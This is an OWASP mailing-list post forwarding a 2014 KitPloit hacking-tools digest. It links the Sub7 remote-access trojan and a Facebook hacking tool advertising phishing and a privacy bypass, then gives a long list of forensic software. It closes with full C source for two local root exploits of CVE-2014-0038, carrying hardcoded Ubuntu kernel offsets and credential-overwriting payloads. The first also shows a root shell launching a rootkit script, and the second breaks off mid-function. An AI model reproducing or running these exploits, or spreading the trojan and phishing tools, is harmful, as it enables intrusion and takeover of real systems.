[Owasp-cuiaba] Fwd: PenTest & Hacking Tools

Kembolle Amilkar contato em kembolle.com.br
Thursday February 6 03:06:23 UTC 2014


Forwarding...
--

- Kembolle Amilkar de Oliveira, Esp.
| T.A.D.S | G.P.N.T.I. |  G.T. I. | Seg. Info. |
Contact: Homepage <http://www.kembolle.com.br> |
Gtalk<contato em kembolle.com.br>|
MSN <contato em kembolle.com.br> | XMMP <contato em kembolle.com.br> |
SkypeID:Oliverkall


---------- Forwarded message ----------
From: KitPloit - The Hacker's Tools <noreply em blogger.com>
Date: 2014-02-05
Subject: PenTest & Hacking Tools
To: contato em kembolle.com.br


    PenTest & Hacking Tools <http://hack-tools.blackploit.com/>
------------------------------

   - [Sub7 v0.5] Remote Administration Tool
   - [FBHT v2.0] Facebook Hacking Tool
   - Collection Of Free Computer Forensic Tools
   - Exploit Linux 3.4+ Local Root (CONFIG_X86_X32=y)
   - Exploit Linux 3.4+ Arbitrary write with CONFIG_X86_X32

[Sub7 v0.5] Remote Administration Tool <http://feedproxy.google.com/~r/PentestHackingTools/~3/AUTxuteJaVs/sub7-v05-remote-administration-tool.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 08:22 PM PST

This is the newest Sub7 Remote Administration Tool. The official releases
can only be found at www.sub-7.org.

Submitted by *Diabl0*
*Password:*www.sub-7.org
*Download Sub7 v0.5 <https://www.dropbox.com/s/yfopzz1nl23aety/Sub7.rar>*

[FBHT v2.0] Facebook Hacking Tool <http://feedproxy.google.com/~r/PentestHackingTools/~3/50WcTg3Z43k/fbht-v20-facebook-hacking-tool.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 03:38 PM PST



*FBHT* (*Facebook Hacking Tool*) is an open-source tool written in Python
that exploits multiple vulnerabilities on the Facebook platform.


The tool provides:

   - Tests account handling (Create, Delete, Friend, Accept)
   - Youtube videos phishing
   - Facebook links preview modification
   - Friends list privacy bypass
   - Graph support
   - More...


*Download FBHT v2.0 <https://github.com/chinoogawa/fbht>*

Collection Of Free Computer Forensic Tools <http://feedproxy.google.com/~r/PentestHackingTools/~3/kxOjTN79_IU/collection-of-free-computer-forensic.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 01:49 PM PST


Disk tools and data capture

   - DumpIt <http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/> (MoonSols): Generates physical memory dump of Windows machines, 32 bit and 64 bit. Can run from a USB flash drive.
   - EnCase Forensic Imager <http://www1.guidancesoftware.com/Order-Forensic-Imager.aspx> (Guidance Software): Create EnCase evidence files and EnCase logical evidence files [direct download link]
   - Encrypted Disk Detector* <http://info.magnetforensics.com/encrypted-disk-detector> (Magnet Forensics): Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
   - EWF MetaEditor <http://www.4discovery.com/our-tools/> (4Discovery): Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
   - FAT32 Format <http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm> (Ridgecrop): Enables large capacity disks to be formatted as FAT32
   - Forensics Acquisition of Websites <http://www.fawproject.com/en/default.aspx> (Web Content Protection Association): Browser designed to forensically capture web pages
   - FTK Imager* <http://www.accessdata.com/support/product-downloads> (AccessData): Imaging tool, disk viewer and image mounter
   - Guymager <http://guymager.sourceforge.net/> (vogu00): Multi-threaded GUI imager running under Linux
   - HotSwap <http://mt-naka.com/hotswap/index_enu.htm> (Kazuyuki Nakayama): Safely remove SATA disks similar to the "Safely Remove Hardware" icon in the notification area
   - LiveView <http://www.sei.cmu.edu/digitalintelligence/tools/liveview/index.cfm> (CERT): Allows examiner to boot dd images in VMware.
   - P2 Explorer Free <http://www.paraben.com/p2-explorer.html> (Paraben): Mount forensic images as read-only local logical and physical disks
   - Live RAM Capturer* <http://forensic.belkasoft.com/en/ram-capturer> (Belkasoft): Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
   - OSFClone <http://www.osforensics.com/tools/create-disk-images.html> (Passmark Software): Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
   - OSFMount <http://www.osforensics.com/tools/mount-disk-images.html> (Passmark Software): Mounts a wide range of disk images. Also allows creation of RAM disks
   - Tableau Imager* <http://www.tableau.com/index.php?pageid=rev_history&product=tim&model=TSW-TIM> (Tableau): Imaging tool for use with Tableau imaging products
   - VHD Tool <http://archive.msdn.microsoft.com/vhdtool> (Microsoft): Converts raw disk images to VHD format which are mountable in Windows Disk Management

Email analysis

   - EDB Viewer <http://www.nucleustechnologies.com/exchange-edb-viewer.html> (Lepide Software): Open and view (not export) Outlook EDB files without an Exchange server
   - Mail Viewer <http://www.mitec.cz/mailview.html> (MiTeC): Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
   - OST Viewer <http://www.nucleustechnologies.com/ost-viewer.html> (Lepide Software): Open and view (not export) Outlook OST files without connecting to an Exchange server
   - PST Viewer <http://www.nucleustechnologies.com/pst-viewer.html> (Lepide Software): Open and view (not export) Outlook PST files without needing Outlook

General

   - Agent Ransack <http://www.mythicsoft.com/page.aspx?type=agentransack&page=home> (Mythicsoft): Search multiple files using Boolean operators and Perl Regex
   - CaseNotes Lite <http://www.blackthorn.com/casenotes-download/> (Blackthorn): Contemporaneous notes recorder
   - Computer Forensic Reference Data Sets <http://www.cfreds.nist.gov/> (NIST): Collated forensic images for training, practice and validation
   - EvidenceMover* <http://www.nuix.com/Nuix-evidence-mover> (Nuix): Copies data between locations, with file comparison, verification, logging
   - FastCopy <http://ipmsg.org/tools/fastcopy.html.en> (Shirouzu Hiroaki): Self labelled 'fastest' copy/delete Windows software. Can verify with SHA-1, etc.
   - File Signatures <http://www.garykessler.net/library/file_sigs.html> (Gary Kessler): Table of file signatures
   - HashMyFiles <http://www.nirsoft.net/utils/hash_my_files.html> (Nirsoft): Calculate MD5 and SHA1 hashes
   - MobaLiveCD <http://mobalivecd-en.mobatek.net/> (Mobatek): Run Linux live CDs from their ISO image without having to boot to them
   - Mouse Jiggler <http://mousejiggler.codeplex.com/> (Arkane Systems): Automatically moves mouse pointer stopping screen saver, hibernation etc.
   - Notepad ++ <http://notepad-plus-plus.org/> (Notepad ++): Advanced Notepad replacement
   - NSRL <http://www.nsrl.nist.gov/Downloads.htm> (NIST): Hash sets of 'known' (ignorable) files
   - Quick Hash <http://sourceforge.net/projects/quickhash/> (Ted Technology): A Linux & Windows GUI for individual and recursive SHA1 hashing of files
   - USB Write Blocker <http://dsicovery.com/dsicovery-software/usb-write-blocker/> (DSi): Enables software write-blocking of USB ports
   - USB Write Blocker <http://www.securitemulti-secteurs.ca/teacuteleacutechargements.html> (Sécurité Multi-Secteurs): Software write blocker for Windows XP through to Windows 8
   - Windows Forensic Environment <http://winfe.wordpress.com/> (Troy Larson): Guide by Brett Shavers to creating and working with a Windows boot CD

File and data analysis

   - Advanced Prefetch Analyser <http://www.ash368.com/> (Allan Hay): Reads Windows XP, Vista and Windows 7 prefetch files
   - analyzeMFT <https://github.com/dkovar/analyzeMFT> (David Kovar): Parses the MFT from an NTFS file system allowing results to be analysed with other tools
   - Defraser <http://sourceforge.net/projects/defraser/> (Various): Detects full and partial multimedia files in unallocated space
   - eCryptfs Parser <http://sourceforge.net/projects/ecryptfs-p/> (Ted Technology): Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
   - Encryption Analyzer <http://www.lostpassword.com/encryption-analyzer.htm> (Passware): Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
   - ExifTool <http://www.sno.phy.queensu.ca/%7Ephil/exiftool/> (Phil Harvey): Read, write and edit Exif data in a large number of file types
   - Forensic Image Viewer <http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software> (Sanderson Forensics): View various picture formats, image enhancer, extraction of embedded Exif, GPS data
   - Highlighter <http://www.mandiant.com/products/free_software/highlighter/> (Mandiant): Examine log files using text, graphic or histogram views
   - Link Parser <http://www.4discovery.com/our-tools/> (4Discovery): Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
   - LiveContactsView <http://www.nirsoft.net/utils/live_messenger_contacts.html> (Nirsoft): View and export Windows Live Messenger contact details
   - RSA Netwitness Investigator* <http://www.emc.com/security/rsa-netwitness.htm#%21freeware> (EMC): Network packet capture and analysis
   - Memoryze <http://www.mandiant.com/products/free_software/memoryze/> (Mandiant): Acquire and/or analyse RAM images, including the page file on live systems
   - MetaExtractor <http://www.4discovery.com/our-tools/> (4Discovery): Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
   - MFTview <http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software> (Sanderson Forensics): Displays and decodes contents of an extracted MFT file
   - NetSleuth <http://www.netgrab.co.uk/> (NetGrab): Network monitoring tool, with covert "silent port scanning"
   - PictureBox <http://www.mikesforensictools.co.uk/MFTPB.html> (Mike's Forensic Tools): Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
   - PsTools <http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx> (Microsoft): Suite of command-line Windows utilities
   - Shadow Explorer <http://www.shadowexplorer.com/> (Shadow Explorer): Browse and extract files from shadow copies
   - Simple File Parser <http://simplefileparser.blogspot.co.uk/> (Chris Mayhew): GUI tool for parsing .lnk files, prefetch and jump list artefacts
   - SQLite Manager <https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/> (Mrinal Kant, Tarakant Tripathy): Firefox add-on enabling viewing of any SQLite database
   - Strings <http://technet.microsoft.com/en-gb/sysinternals/bb897439.aspx> (Microsoft): Command-line tool for text searches
   - Structured Storage Viewer <http://www.mitec.cz/ssv.html> (MiTec): View and manage MS OLE Structured Storage based files
   - Switch-a-Roo <http://www.mikesforensictools.co.uk/MFTSAR.html> (Mike's Forensic Tools): Text replacement/converter/decoder for when dealing with URL encoding, etc.
   - Windows File Analyzer <http://www.mitec.cz/wfa.html> (MiTeC): Analyse thumbs.db, Prefetch, INFO2 and .lnk files

Mac OS tools

   - Audit <https://github.com/twocanoes/audit> (Twocanoes Software): Audit Preference Pane and Log Reader for OS X
   - Disk Arbitrator <https://github.com/aburgh/Disk-Arbitrator> (Aaron Burghardt): Blocks the mounting of file systems, complementing a write blocker in disabling disk arbitration
   - Epoch Converter* <https://www.blackbagtech.com/resources/freetools/epochconverter.html> (Blackbag Technologies): Converts epoch times to local time and UTC
   - FTK Imager CLI for Mac OS* <http://accessdata.com/support/adownloads> (AccessData): Command line Mac OS version of AccessData's FTK Imager
   - IORegInfo <https://www.blackbagtech.com/resources/freetools/ioreg-info.html> (Blackbag Technologies): Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
   - Mac Memory Reader <http://cybermarshal.com/index.php/cyber-marshal-utilities/mac-memory-reader> (Cyber Marshal): Command-line utility to capture physical RAM from Mac OS systems
   - PMAP Info* <https://www.blackbagtech.com/resources/freetools/pmap-info.html> (Blackbag Technologies): Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors

Mobile devices

   - iPhone Analyzer <http://sourceforge.net/projects/iphoneanalyzer/> (Leo Crawford, Mat Proud): Explore the internal file structure of iPad, iPod and iPhones
   - ivMeta <http://www.csitech.co.uk/ivmeta-iphone-metadata/> (Robin Wood): Extracts phone model and software version and created date and GPS data from iPhone videos.
   - Rubus* <http://www.cclgroupltd.com/Buy-Software/rubus-ipd-de-constructor-utility.html> (CCL Forensics): Deconstructs Blackberry .ipd backup files
   - SAFT <http://www.signalsec.com/saft/> (SignalSEC Corp): Obtain SMS Messages, call logs and contacts from Android devices
   - WhatsApp Forensics <http://blog.digital-forensics.it/2012/05/whatsapp-forensics.html> (Zena Forensics): Extract WhatsApp messages from iOS and Android backups

Data analysis suites

   - Autopsy <http://www.sleuthkit.org/autopsy/> (Brian Carrier): Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
   - Backtrack <http://www.backtrack-linux.org/> (Backtrack): Penetration testing and security audit with forensic boot capability
   - Caine <http://www.caine-live.net/> (Nanni Bassetti): Linux based live CD, featuring a number of analysis tools
   - Deft <http://www.deftlinux.net/> (Dr. Stefano Fratepietro and others): Linux based live CD, featuring a number of analysis tools
   - Digital Forensics Framework <http://www.digital-forensic.org/> (ArxSys): Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
   - Forensic Scanner <https://github.com/appliedsec/forensicscanner> (Harlan Carvey): Automates 'repetitive tasks of data collection'. Fuller description here
   - Paladin* <http://www.sumuri.com/> (Sumuri): Ubuntu based live boot CD for imaging and analysis
   - SIFT* <http://computer-forensics.sans.org/community/downloads/> (SANS): VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
   - The Sleuth Kit <http://www.sleuthkit.org/sleuthkit/> (Brian Carrier): Collection of UNIX-based command line file and volume system forensic analysis tools
   - Ubuntu guide <http://www.howtogeek.com/howto/15761/recover-data-like-a-forensics-expert-using-an-ubuntu-live-cd/> (How-To Geek): Guide to using an Ubuntu live disk to recover partitions, carve files, etc.
   - Volatility Framework <https://www.volatilesystems.com/default/volatility> (Volatile Systems): Collection of tools for the extraction of artefacts from RAM

File viewers

   - Microsoft PowerPoint 2007 Viewer <http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=6> (Microsoft): View PowerPoint presentations
   - Microsoft Visio 2010 Viewer <http://www.microsoft.com/download/en/details.aspx?id=21701> (Microsoft): View Visio diagrams
   - VLC <http://www.videolan.org/> (VideoLAN): View most multimedia files and DVD, Audio CD, VCD, etc.

Internet analysis

   - Chrome Session Parser <https://code.google.com/p/ccl-ssns/> (CCL Forensics): Python module for performing off-line parsing of Chrome session files ("Current Session", "Last Session", "Current Tabs", "Last Tabs")
   - ChromeCacheView <http://www.nirsoft.net/utils/chrome_cache_view.html> (Nirsoft): Reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache
   - Cookie Cutter <http://www.mikesforensictools.co.uk/MFTCookie.html> (Mike's Forensic Tools): Extracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits.
   - Dumpzilla <http://www.dumpzilla.org/> (Busindre): Runs in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information.
   - Facebook Profile Saver <http://forensic.belkasoft.com/en/facebook_profile_saver> (Belkasoft): Captures information publicly available in Facebook profiles.
   - IECookiesView <http://www.nirsoft.net/utils/iecookies.html> (Nirsoft): Extracts various details of Internet Explorer cookies
   - IEPassView <http://www.nirsoft.net/utils/internet_explorer_password.html> (Nirsoft): Extract stored passwords from Internet Explorer versions 4 to 8
   - MozillaCacheView <http://www.nirsoft.net/utils/mozilla_cache_viewer.html> (Nirsoft): Reads the cache folder of Firefox/Mozilla/Netscape Web browsers
   - MozillaCookieView <http://www.nirsoft.net/utils/mzcv.html> (Nirsoft): Parses the cookie folder of Firefox/Mozilla/Netscape Web browsers
   - MozillaHistoryView <http://www.nirsoft.net/utils/mozilla_history_view.html> (Nirsoft): Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web pages
   - MyLastSearch <http://www.nirsoft.net/utils/my_last_search.html> (Nirsoft): Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
   - PasswordFox <http://www.nirsoft.net/utils/passwordfox.html> (Nirsoft): Extracts the user names and passwords stored by Mozilla Firefox Web browser
   - OperaCacheView <http://www.nirsoft.net/utils/opera_cache_view.html> (Nirsoft): Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
   - OperaPassView <http://www.nirsoft.net/utils/opera_password_recovery.html> (Nirsoft): Decrypts the content of the Opera Web browser password file, wand.dat
   - Web Historian <http://www.mandiant.com/resources/download/web-historian> (Mandiant): Reviews list of URLs stored in the history files of the most commonly used browsers
   - Web Page Saver* <http://info.magnetforensics.com/web-page-saver> (Magnet Forensics): Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages

Registry analysis

   - ForensicUserInfo <http://www.woanware.co.uk/forensics/forensicuserinfo.html> (Woanware): Extracts user information from the SAM, SOFTWARE and SYSTEM hive files and decrypts the LM/NT hashes from the SAM file
   - Process Monitor <http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx> (Microsoft): Examine Windows processes and registry threads in real time
   - Registry Decoder <http://www.digitalforensicssolutions.com/registrydecoder/> (US National Institute of Justice, Digital Forensics Solutions): For the acquisition, analysis, and reporting of registry contents
   - RegRipper <http://regripper.wordpress.com/> (Harlan Carvey): Registry data extraction and correlation tool
   - Regshot <http://sourceforge.net/projects/regshot/files/> (Regshot): Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
   - sbag <https://www.tzworks.net/prototype_page.php?proto_id=14> (TZWorks): Extracts data from Shellbag entries
   - USB Device Forensics <http://www.woanware.co.uk/forensics/usbdeviceforensics.html> (Woanware): Details previously attached USB devices on exported registry hives
   - USB Historian <http://www.4discovery.com/our-tools/> (4Discovery): Displays 20+ attributes relating to USB device use on Windows systems
   - USBDeview <http://www.nirsoft.net/utils/usb_devices_view.html> (Nirsoft): Details previously attached USB devices
   - User Assist Analysis <http://www.4discovery.com/our-tools/> (4Discovery): Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
   - UserAssist <http://blog.didierstevens.com/programs/userassist/> (Didier Stevens): Displays list of programs run, with run count and last run date and time
   - Windows Registry Recovery <http://www.mitec.cz/wrr.html> (MiTec): Extracts configuration settings and other information from the Registry

Application analysis

   - Dropbox Decryptor* <http://info.magnetforensics.com/dropbox-decryptor> (Magnet Forensics): Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
   - Google Maps Tile Investigator* <http://info.magnetforensics.com/google-maps-tile-investigator> (Magnet Forensics): Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
   - KaZAlyser <http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software> (Sanderson Forensics): Extracts various data from the KaZaA application
   - LiveContactsView <http://www.nirsoft.net/utils/live_messenger_contacts.html> (Nirsoft): View and export Windows Live Messenger contact details
   - SkypeLogView <http://www.nirsoft.net/utils/skype_log_view.html> (Nirsoft): View Skype calls and chats

Abandonware

   - DCode <http://www.digital-detective.co.uk/downloads.asp> (Digital Detective): Converts various data types to date/time values
   - iPhone Backup Browser <http://code.google.com/p/iphonebackupbrowser/> (Rene Devichi): View unencrypted backups of iPad, iPod and iPhones
   - ChromeAnalysis <http://forensic-software.co.uk/Downloads/Default.aspx> (Foxton Software): Analysis of internet history data generated using Google Chrome
   - IEHistoryView <http://www.nirsoft.net/utils/iehv.html> (Nirsoft): Extracts recently visited Internet Explorer URLs



*Source <http://forensiccontrol.com/resources/free-software/>*

Exploit Linux 3.4+ Local Root (CONFIG_X86_X32=y) <http://feedproxy.google.com/~r/PentestHackingTools/~3/cBw4OroSyoY/exploit-linux-34-local-root.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 11:10 AM PST

OSVDB-ID: 2014-0038 <http://osvdb.org/show/osvdb/2014-0038>
Author: rebel
Published: 2014-02-02

/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------

takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.

some things you could do while waiting:
  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
  * brew some coffee
  * stare at the countdown giggly with anticipation

could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.

&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes

hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..

same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y

user em ubuntu:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC
2013 x86_64 x86_64 x86_64 GNU/Linux
user em ubuntu:~$ gcc recvmmsg.c -o recvmmsg
user em ubuntu:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..

:)=

greets to my homeboys kaliman, beist, capsl & all of #social

Sat Feb  1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <time.h>       // time() is used below to seed rand()

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0},
// Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40},
// Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0,
0xffffffff81084500}, // Ubuntu 13.04
    {NULL,0,0,0,0}
};

void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;

    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }

        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }

}

void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);

    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }

    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }

    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

    srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3,
PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,
0, 0);

    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }

    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3,
PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));

    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    for(i=0;i < 3 ;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }

    close(sockfd);

    fprintf(stderr,"\n");

    trigger();
}


*Download Exploit Linux 3.4+ local root <http://www.exploit-db.com/download/31347>*

Exploit Linux 3.4+ Arbitrary write with CONFIG_X86_X32 <http://feedproxy.google.com/~r/PentestHackingTools/~3/7jI-PRPYflQ/exploit-linux-34-arbitrary-write-with.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 11:07 AM PST

CVE: 2014-0038 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038>
Author: saelo
Published: 2014-02-02

/*
 * Local root exploit for CVE-2014-0038.
 *
 * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c
 *
 * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the
 * timeout pointer passed from userspace.
 *
 * Exploit primitive: Pass a pointer to a kernel address as timeout
 * for recvmmsg, if the original byte at that address is known it can
 * be overwritten with known data.
 * If the least significant byte is 0xff, waiting 255 seconds will
 * turn it into a 0x00.
 *
 * Restrictions: The first long at the passed address (tv_sec) has to
 * be positive and the second long (tv_nsec) has to be smaller than
 * 1000000000.
 *
 * Overview: Target the release function pointer of the ptmx_fops
 * structure located in non initialized (and thus writable) kernel
 * memory. Zero out the three most significant bytes and thus turn it
 * into a pointer to an address mappable in user space.
 * The release pointer is used as it is followed by 16 0x00 bytes (so
 * the tv_nsec is valid).
 * Open /dev/ptmx, close it and enjoy.
 *
 * Not very beautiful but should be fairly reliable if symbols can be resolved.
 *
 * Tested on Ubuntu 13.10
 *
 * gcc timeoutpwn.c -o pwn && ./pwn
 *
 * Written by saelo
 */
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mman.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)

#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8

/*
 * Adapt these addresses for your need.
 * see /boot/System.map* or /proc/kallsyms
 * These are the offsets from ubuntu 3.11.0-12-generic.
 */
#define PTMX_FOPS           0xffffffff81fb30c0LL
#define TTY_RELEASE         0xffffffff8142fec0LL
#define COMMIT_CREDS        0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

/*
 * Match signature of int release(struct inode*, struct file*).
 *
 * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz
 */
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;    // restore pointer
    commit_creds(prepare_kernel_cred(0));

    return -1;
}

/*
 * Write a zero to the byte at the given address.
 * Only works if the current value is 0xff.
 */
void zero_out(long addr)
{
    int sockfd, retval, port, pid, i;
    struct sockaddr_in sa;
    char buf[BUFSIZE];
    struct mmsghdr msgs;
    struct iovec iovecs;

    srand(time(NULL));

    port = 1024 + (rand() % (0x10000 - 1024));

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }

    sa.sin_family      = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port        = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    memset(&msgs, 0, sizeof(msgs));
    iovecs.iov_base         = buf;
    iovecs.iov_len          = BUFSIZE;
    msgs.msg_hdr.msg_iov    = &iovecs;
    msgs.msg_hdr.msg_iovlen = 1;

